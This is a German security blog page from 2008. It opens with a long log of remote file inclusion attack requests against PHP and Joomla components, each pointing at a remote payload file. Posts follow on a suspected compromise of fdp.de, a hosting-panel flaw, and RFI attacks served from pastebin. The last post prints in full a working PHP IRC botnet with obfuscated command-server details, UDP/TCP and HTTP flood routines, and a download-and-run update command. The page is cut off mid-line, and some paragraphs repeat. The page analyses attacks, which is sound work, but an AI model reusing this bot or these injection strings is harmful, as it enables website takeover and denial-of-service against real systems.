/main.php?act=list&cat_id=http://www.helpvenice.com/id.txt??
/main.php?act=list&cat_id=http://www.helpvenice.com/id.txt??
//include/lib.inc.php?site_path=http://geocities.com/demochist_hady/botol.txt?
//versuri//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
/errors.php?error=http://chebugis.net/id.txt???
/index.php?lg=http://www.correiios.com/idddd.txt???
//include/lib.inc.php?site_path=http://www.tauberspace.de/modules/cms/01.gif?
//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt????
/index.php?lg=http://www.correiios.com/idddd.txt???
//include/lib.inc.php?site_path=http://www.bookshuffle.com/prodimages/cgi-bin/phyro.txt?
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt??
/content.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/content.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/index.php?load=http://www.spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo?
//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://cnpl.lu/upload/cmd.txt?
//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://brojolelle.org/bnc/id.txt????
/content.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/content.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt????
//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt????
//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt????
/index1.php?go=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/index1.php?go=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
//versuri//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
//versuri/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt??
/content.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/content.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
//game/skin/uks_gallery_v2010/setup.php//bbs/include/print_category.php?setup[use_category]=1&dir=http://chebugis.net/id.txt???
//game/skin/uks_gallery_v2010/setup.php//bbs/include/print_category.php?setup[use_category]=1&dir=http://chebugis.net/id.txt???
//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt????
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt???
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt???
//include/lib.inc.php?site_path=http://geocities.com/demochist_hady/botol.txt?
/template.php?str=http://bjork.name.md/id.txt??
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt???
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt???
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt???
/errors.php?error=http://h1.ripway.com/ptoleman/id.txt?
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt??
/index.php?load=http://www.spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo?
//facileforms.frame.php?ff_compath=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//game/skin/uks_gallery_v2010/setup.php//bbs/include/print_category.php?setup[use_category]=1&dir=http://chebugis.net/id.txt???
/errors.php?error=http://h1.ripway.com/ptoleman/id.txt?
/index.php?option=com_comprofiler&Itemid=&extmode=&extid=&mosConfig_absolute_path=http://www.spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo?
/errors.php?error=http://h1.ripway.com/ptoleman/id.txt?
/index2.php?x=http://www.chbt.net/tour/loc.al?????
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
//include/lib.inc.php?site_path=http://www.satinvestigacion.net/foro5/includes/TT??
//include/lib.inc.php?site_path=http://convertcobracoverage.com/healthinsurancewriters/cyberz.txt??
//include/lib.inc.php?site_path=http://geocities.com/febriyunizar/botc.txt?
/admin.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
//include/write.php?dir=http://www.autosate.ru/images/borda.jpg?
//include/lib.inc.php?site_path=http://geocities.com/demochist_hady/botol.txt?
/admin.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
//include/lib.inc.php?site_path=http://geocities.com/febriyunizar/botc.txt?
/nav.php?go=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//include/lib.inc.php?site_path=http://sobi.t35.com/kiddie.txt???
//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt????
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt???
/index2.php?x=http://www.chbt.net/tour/loc.al?????
//include/lib.inc.php?site_path=http://geocities.com/franc0boy/Franco.txt?
///?custompluginfile[]=http://brojolelle.org/bnc/id.txt????
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt???
//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://geocities.com/franc0boy/Franco.txt?
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt???
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt???
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt???
///?custompluginfile[]=http://brojolelle.org/bnc/id.txt????
//index.php3?act=http://www.beschorner86.de/cms//modules/cmd/cid.txt???
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt???
//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://tanahdijual.com/id.txt???
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt???
//calendar/setup/header.inc.php?serverPath=http://chebugis.net/id.txt???
/*.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
/*.php?page=http://memex.c3.hu/~tata/limesurvey/tmp/alb??
//include/lib.inc.php?site_path=http://geocities.com/febriyunizar/botc.txt?
/index.php?meio=http://www.jfc.info/jfcinfo/grafiken/i???
/errors.php?error=http://www.jfc.info/jfcinfo/grafiken/i???
//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://lawoder.t35.com/id.txt?%0D??
//include/lib.inc.php?site_path=http://geocities.com/febriyunizar/botc.txt?
//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.autosate.ru/images/borda.jpg?
//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://lawoder.t35.com/id.txt?%0D??
Wednesday, August 20. 2008
[malware] fdp.de gehackt?
Scheinbar ist die fdp.de Webseite Opfer einer RFI Attacke geworden.
In der letzten Zusammenfassung des tschechischen Honeynet Projektes fiel ein Eintrag auf:
Bericht vom 20.August 2008
Beispiele:
http://forums.oscommerce.de/index.php?showtopic=64731&view=getlastpost
können wir trotzdem einen Blick darauf werfen:
In der letzten Zusammenfassung des tschechischen Honeynet Projektes fiel ein Eintrag auf:
Bericht vom 20.August 2008
STATISTIKA PRO RFI/XSS - MALWARE Link na malware - pocet IP - pocet utoku http://fdp.de/vorschaltseite/did.txt - 31 - 94 - 6a608609c0535feef25f60325d2e40cbund noch ein zweiter:
http://fdp.de/vorschaltseite/id.txt - 58 - 249 - 9e816808f1debe9ebeecb08654c2d5c2Im Bericht vom Vortag finden sich folgende Einträge:
http://fdp.de/vorschaltseite/did.txt - 3 - 6 - 6a608609c0535feef25f60325d2e40cb http://fdp.de/vorschaltseite/id.txt - 28 - 163 - 9e816808f1debe9ebeecb08654c2d5c2Im Bericht vom 17. August taucht die Adresse das erstemal auf:
http://fdp.de/vorschaltseite/did.txt - 7 - 18 - 6a608609c0535feef25f60325d2e40cbEine google-Suche nach fdp.de/vorschaltseite gibt uns Gewissheit.
Beispiele:
http://forums.oscommerce.de/index.php?showtopic=64731&view=getlastpost
00:00:00 libwww-perl artmam.com 13:12:02 /index.php?custompluginfile[]=http://fdp. de/vorschaltseite/id.txthttp://infolac.ucol.mx/access/
pbb_root_path=http://fdp.de/vorschaltseite/id.txt?Obwohl die Dateie(en) nicht mehr auf der FDP Vorschaltseite zu finden sind,
können wir trotzdem einen Blick darauf werfen:
Thursday, August 14. 2008
server4you: ID:ABM-260448 ROLE hostmaster intergenia
Dies wird nun zu einer Art unendlicher Geschichte.
In der Nacht vom 11. zum 12.8.2008 habe ich einmal angetestet,
ob meine Theorie bezüglich Fehlern im sog. "powerpanel" von server4you zutrifft.
Es war mir möglich über mein "powerpanel" den ROLE des hostmaster intergenia AG erfolgreich zu bearbeiten.
Wenn ich als Kunde das kann, kann es jeder Kunde.
Die Funktion, den Inhalt des Handles ABM-260448 zu bearbeiten, wird mir ganz offiziell in meinem Kundeninterface angeboten.
Wenn man sich in seine Verwaltungswebseite eingelogt hat,
kann man sich entweder über die Domainverwaltung durchklicken oder man ruft die Seite direkt auf:
Change ROLE handle ABM-260448
Natürlich habe ich dem Support dies gemeldet.
In der Nacht vom 11. zum 12.8.2008 habe ich einmal angetestet,
ob meine Theorie bezüglich Fehlern im sog. "powerpanel" von server4you zutrifft.
Es war mir möglich über mein "powerpanel" den ROLE des hostmaster intergenia AG erfolgreich zu bearbeiten.
Wenn ich als Kunde das kann, kann es jeder Kunde.
Die Funktion, den Inhalt des Handles ABM-260448 zu bearbeiten, wird mir ganz offiziell in meinem Kundeninterface angeboten.
Wenn man sich in seine Verwaltungswebseite eingelogt hat,
kann man sich entweder über die Domainverwaltung durchklicken oder man ruft die Seite direkt auf:
Change ROLE handle ABM-260448
Natürlich habe ich dem Support dies gemeldet.
Saturday, August 9. 2008
[malware] RFI Attacken mit Hilfe von pastebin.ubuntu.com
Ob ubuntu Eure bevorzugte Distribution ist, sei einmal dahingestellt.
Offensichtlich wird jedoch der pastebin im "plain" dafür ausgenutzt webseiten zu übernehmen.
Schauen wir uns einmal diesen letzten "pastebin" an:
Offensichtlich wird jedoch der pastebin im "plain" dafür ausgenutzt webseiten zu übernehmen.
CODE:
cat rfi.txt |grep pastebin
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33902/plain/???
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33897/plain/?
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/?
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/
/doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33946/plain/?
/doc///vwar/backup/errors.php?error=http://pastebin.ubuntu.com/35446/plain/???
Schauen wir uns einmal diesen letzten "pastebin" an:
CODE:
<?php
ignore_user_abort(TRUE);
set_time_limit(0);
error_reporting(E_ALL);
class bMain
{
var $config = array(
// "prefix" => "HOMOVAN|",
"maxnumbers" => 5,
"maxident" => 6,
"trigger" => ".",
"modes" => "-ix",
"adminhosts" => array("i.love.ircsluts.net"),
"sockbuffer" => 512,
"rejoindelay" => 900,
"cpingdelay" => 10,
"chessburstudp" => 5000,
"chessbursttcp" => 100,
"httpburst" => 20,
);
var $servers = array(
array(
"host" => "Y2FydGVyLndpZ2d5bmV0Lm9yZy51aw==",
"port" => "OTAwMA==",
"channels" => array("I21vYmZpZ2dh"),
"control" => true,
),
);
var $bots = array();
var $lastrejointime;
function bMain()
{
$this->lastrejointime = time();
}
function start()
{
foreach ($this->servers as $srv)
{
$bot = new bBot;
$bot->setnick($this->generatenick());
$bot->setcontrol($srv["control"]);
foreach ($srv["channels"] as $chan) $bot->channels[] = base64_decode($chan);
$bot->setdestination(base64_decode($srv["host"]),base64_decode($srv["port"]),$this->generateident());
$bot->lastreconnect = time();
$bot->connect();
$this->bots[] = $bot;
}
while (1) $this->heartbeat();
}
function heartbeat()
{
if (time()-$this->lastrejointime >= $this->config["rejoindelay"])
{
$this->lastrejointime = time();
$botcnt = count($this->bots);
for ($i=0; $i<$botcnt; $i++) $this->bots[$i]->joinchans();
}
foreach ($this->bots as $botlol) {
if ($botlol->isconnected()) $botlol->parsebuffer();
elseif (time()-10 > $botlol->lastreconnect) {
/* $botlol->lastreconnect = time();
$botlol->setnick($this->generatenick());
$botlol->connect();*/
exit();
}
}
}
function generatenick()
{
/* $randnick = $this->config["prefix"];
for ($i=0;$i<$this->config["maxnumbers"];$i++) $randnick .= mt_rand(0,9);
return $randnick;*/
$nprefixes = array("Wolf","Wolfeh","Wolfy","Dog","Doggy","Doggy","Cheetah","Yiff","Yiffy","Lion","Lioness","Tiger","Tigah","Aardvark","Badger","Beaver","Cat","Kitty","Deer","Donkey","Donkeh","Bear","Grizzly","Hamster","Pikachu","Mudkip","Goat","Coyote","Flame","Mustang","Lynx","Stallion","Tapir","Panda","Pony","Bunny","Dawg","Inu","Neko","Usagi","Kitsune","Kitune","Tails","Horny","Kinky","Yiffy","Sexy","Manly","Female","Horneh","Sex","Sxc","Flame","Viper","Fire","Desu","Angry","Happy","Playful","Naughty","Good","Speed","Snow","Beach","Windy","Dream","Dreamer","Afro","Skritchy","Lovely","Sonic");
$newnick = $nprefixes[array_rand($nprefixes)].$nprefixes[array_rand($nprefixes)];
for ($i=0; $i<mt_rand(1,$this->config["maxnumbers"]); $i++) $newnick .= mt_rand(0,9);
return strtolower($newnick);
}
function generateident()
{
$alph = range("a","z");
$randident = "";
for($i = 0;$i<$this->config["maxident"];$i++) $randident .= $alph[rand(0,25)];
return $randident;
}
function activeconnections()
{
$concount = 0;
foreach ($this->bots as $bot)
{
if ($bot->isconnected()) $concount++;
}
return $concount;
}
function startchess($t, $h, $p, $ps, $ti)
{
/* if (strlen($this->chessfile) < 1) $this->chessfile = $this->createchessfile();
$this->spawnfakethreads("php ".$this->chessfile." ".base64_encode($h)." ".base64_encode($p)." ".base64_encode($ps)." ".base64_encode($t), intval($th));*/
$ho = "";
if ($t == "udp") {
$burst = $this->config["chessburstudp"];
$ho = "udp://";
//print("using udp $burst\n");
}
elseif ($t == "tcp") {
$burst = $this->config["chessbursttcp"];
$ho = "tcp://";
//print("using tcp $burst\n");
}
//else print("else $t\n");
$ho .= $h;
$lastping = 0;
$out = "";
for($i=0;$i<$ps;$i++) $out .= chr(mt_rand(1, 256));
$i = 0;
$pakcnt = 0;
$timei = time();
while (1) {
if ($p < 1 || $p > 65000) $po = mt_rand(1,65000);
else $po = $p;
@$fp = fsockopen($ho, $po, $errno, $errstr, 1);
if ($fp) {
fwrite($fp, $out);
fclose($fp);
}
$i++;
if ($i >= $burst) {
$ctime = time();
if ($ctime - $lastping >= $this->config["cpingdelay"]) {
foreach ($this->bots as $botlol) {
$botlol->raw("PING");
}
$lastping = $ctime;
}
$pakcnt += $i;
if ($ctime - $timei >= $ti) return $pakcnt;
else $i = 0;
}
}
}
function starthttp($url, $secs)
{
$agents = array(
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.4/Megaupload x.0",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20030306 Camino/0.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0",
"Opera/9.50 (Windows NT 5.1; U; en-GB)",
"Opera/9.50 (Windows NT 5.1; U; en-US)",
);
$parsed = parse_url($url);
if (!$parsed) return false;
$servip = gethostbyname($parsed['host']);
if (!$parsed['query']) $parsed['query'] = "";
$lastping = 0;
$i = 0;
$reqcnt = 0;
$timei = time();
while (1) {
if ($sock = fsockopen($servip, 80, $errno, $errstr, 1)) {
$packet = "GET ".$parsed['path']."?".$parsed['query']." HTTP/1.1\r\n"
. "User-Agent: ".$agents[array_rand($agents)]."\r\n"
. "Host: ".$parsed['host']."\r\n"
. "Connection: Keep-Alive\r\n\r\n";
fwrite($sock, $packet);
fclose($sock);
}
$i++;
if ($i >= $this->config["httpburst"]) {
$ctime = time();
if ($ctime-$lastping >= $this->config["cpingdelay"]) {
foreach ($this->bots as $botlol) {
$botlol->raw("PING");
}
$lastping = $ctime;
}
$reqcnt += $i;
if ($ctime - $timei >= $secs) return $reqcnt;
else $i = 0;
}
}
}
/* function spawnfakethreads($cmd, $qty)
{
if (stristr(PHP_OS, "WIN")) $fullcmd = "start $cmd";
else $fullcmd = "$cmd > /dev/null 2>&1 &";
for ($i=0; $i<$qty; $i++) {
shell_exec($fullcmd);
}
}*/
function update($url, $killprocess, $runcmd, $sourcebot, $source)
{
//$starttime = time();
$updcode = file_get_contents($url);
if ($updcode) $sourcebot->say("Got ".strlen($updcode)." bytes", $source);
else return false;
//$destfile = $this->randtempfile();
$destfile = tempnam("/tmp", "pdata");
$fh = fopen($destfile, "w");
fwrite($fh, $updcode);
fclose($fh);
$this->spawnfakethreads($runcmd." ".$destfile, 1);
unlink($destfile);
if ($killprocess = 1) die("Updating");
}
/* function createchessfile()
{
$tmpfile = tempnam("datab", "/tmp");
$fh = fopen($tmpfile, "w");
fwrite($fh, base64_decode($this->csrc));
fclose($fh);
return $tmpfile;
}*/
}
class bBot
{
var $currenthost;
var $currentport;
var $currentident;
var $currentnick = "unset";
var $channels = array();
var $allowcontrol = false;
var $socket;
var $lastreconnect;
function setdestination($host, $port, $ident)
{
$this->currenthost = $host;
$this->currentport = $port;
$this->currentident = $ident;
}
function connect()
{
$this->socket = fsockopen($this->currenthost, $this->currentport, $errno, $errstr, 5);
if (feof($this->socket))
{
print("connection error: $errstr [$errno]\n");
return false;
}
stream_set_blocking($this->socket, 0);
$this->raw("USER ".$this->currentident." 127.0.0.1 localhost :".php_uname()."");
$this->raw("NICK ".$this->currentnick);
return true;
}
function disconnect()
{
$this->raw("QUIT :Disconnecting");
fclose($this->socket);
}
function setnick($nick, $set = false)
{
if ($set) $this->raw("NICK $nick");
$this->currentnick = $nick;
}
function setcontrol($control)
{
$this->allowcontrol = $control;
}
function joinchans()
{
foreach ($this->channels as $chan) $this->raw("JOIN $chan");
}
function raw($text)
{
fwrite($this->socket, $text."\r\n");
}
function say($text, $target, $notice = false)
{
if (!$notice) $this->raw("PRIVMSG $target :$text");
else $this->raw("NOTICE $target :$text");
}
function isconnected()
{
if ($this->socket && !feof($this->socket)) return true;
else return false;
}
function parsebuffer()
{
global $mainclass;
$buf = trim(fgets($this->socket, $mainclass->config["sockbuffer"]));
if (!$buf || strlen($buf) < 3)
{
usleep(100000);
return false;
}
if (substr($buf,0,6) == "PING :") $this->raw("PONG :".substr($buf,6));
$cmd = explode(" ", $buf);
if (isset($cmd[1]))
{
switch ($cmd[1])
{
case "001":
$this->raw("MODE ".$this->currentnick." :".$mainclass->config["modes"]);
$this->joinchans();
break;
case "433":
$this->raw("NICK {$this->currentnick}");
break;
case "PRIVMSG":
if (!$this->allowcontrol) break;
$host = explode("@", $cmd[0]);
$text = substr($cmd[3], 1);
for ($i=4; $i<1024; $i++) {
if (isset($cmd[$i])) $text .= " ".$cmd[$i];
else break;
}
if (substr($text, 0, 1) == $mainclass->config["trigger"]) {
$textnoprefix = substr($text, 1);
$textsplit = explode(" ", $textnoprefix);
//if ($host[1] == $mainclass->config["adminhost"]) $this->parsecommand($textsplit, $cmd[2], $cmd[0]);
foreach ($mainclass->config["adminhosts"] as $admhost) {
if (stristr($host[1], $admhost)) {
$this->parsecommand($textsplit, $cmd[2], $cmd[0]);
break;
}
}
}
break;
case "KICK":
if ($cmd[3] == $this->currentnick) $this->joinchans();
break;
}
}
}
function parsecommand($args, $source, $hostname = "")
{
global $mainclass;
$numargs = count($args)-1;
switch ($args[0]) {
// ADMIN COMMANDS GO HERE
case "test":
$this->say("hello", $source);
break;
case "status":
$this->say("Connected to ".$mainclass->activeconnections()." server(s).", $source);
break;
case "info":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->say("$uname (safe: $safemode)", $source);
if ($_SERVER['SERVER_NAME'] && $_SERVER['REQUEST_URI']) $this->say("http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . "", $source);
break;
case "die":
$this->raw("QUIT :Die command received from $source");
die();
break;
case "chess":
if ($numargs < 5) {
$this->say("Usage: ".$mainclass->config["trigger"]."chess [type (tcp/udp)] [host] [port] [bytes] [secs]", $source);
break;
}
if ($args[1] != "tcp" && $args[1] != "udp") {
$this->say("Invalid type specified", $source);
break;
}
$this->say("Chess starting", $source);
$psizeint = intval($args[4]);
$secsint = intval($args[5]);
$pakits = $mainclass->startchess($args[1], $args[2], intval($args[3]), $psizeint, $secsint);
$mbsent = round(($psizeint*$pakits)/1048576, 2);
$this->say("Chess finished (".$args[1].") - host: ".$args[2].":".$args[3].", psize: ".$args[4].", secs: ".$args[5].", sent: ".$mbsent." megabytes at ".round($mbsent/$secsint, 2)." mb/s", $source);
break;
/* case "stopchess":
if ($mainclass->chessrunning) $this->say("Stopping chess!", $source);
else $this->say("You're not playing chess you asshat", $source);
$mainclass->stopchess = true;
break;*/
case "update":
if ($numargs < 3) {
$this->say("Usage: ".$mainclass->config["trigger"]."update [url] [run with] [kill this process (0/1)]", $source);
break;
}
$this->say("Starting update download...", $source);
if (!$mainclass->update($args[1], $args[2], intval($args[3]), $this, $source)) $this->say("Error downloading file, aborting.", $source);
break;
case "connections":
foreach ($mainclass->bots as $botid => $botlol) if ($botlol->isconnected()) $this->say("(\2".$botid."\2) ".$botlol->currenthost.":".$botlol->currentport." - ".$botlol->currentnick, $source);
break;
case "connect":
if ($numargs < 5) {
$this->say("Usage: ".$mainclass->config["trigger"]."connect [host] [port] [nick (0=rand)] [channels (,)] [control (0,1)]", $source);
break;
}
$this->say("Connecting to ".$args[1]."...", $source);
$newbot = new bBot;
if ($args[3] != "0") $newbot->setnick($args[3]);
else $newbot->setnick($mainclass->generatenick());
if ($args[5] == "1") $newbot->setcontrol(true);
else $newbot->setcontrol(false);
$newchannels = explode(",", $args[4]);
foreach ($newchannels as $newchan) $newbot->channels[] = $newchan;
$newbot->setdestination($args[1],$args[2],$mainclass->generateident());
$newbot->connect();
if ($newbot->isconnected()) {
$mainclass->bots[] = $newbot;
$this->say("Connection successful, use "disconnect" to disconnect.", $source);
}
else $this->say("Connection error!", $source);
break;
case "disconnect":
if ($numargs < 1) {
$this->say("Usage: ".$mainclass->config["trigger"]."disconnect [conid]", $source);
break;
}
$conid = intval($args[1]);
if (strlen($args[1]) > 2 || !$mainclass->bots[$conid]) {
$this->say("Invalid connection ID", $source);
break;
}
if ($mainclass->bots[$conid]->allowcontrol) {
$ctrlbots = 0;
foreach ($mainclass->bots as $bawt) {
if ($bawt->allowcontrol) $ctrlbots++;
}
if ($ctrlbots <= 1) {
$this->say("Cannot disconnect while only one control connection remaining, use "die"", $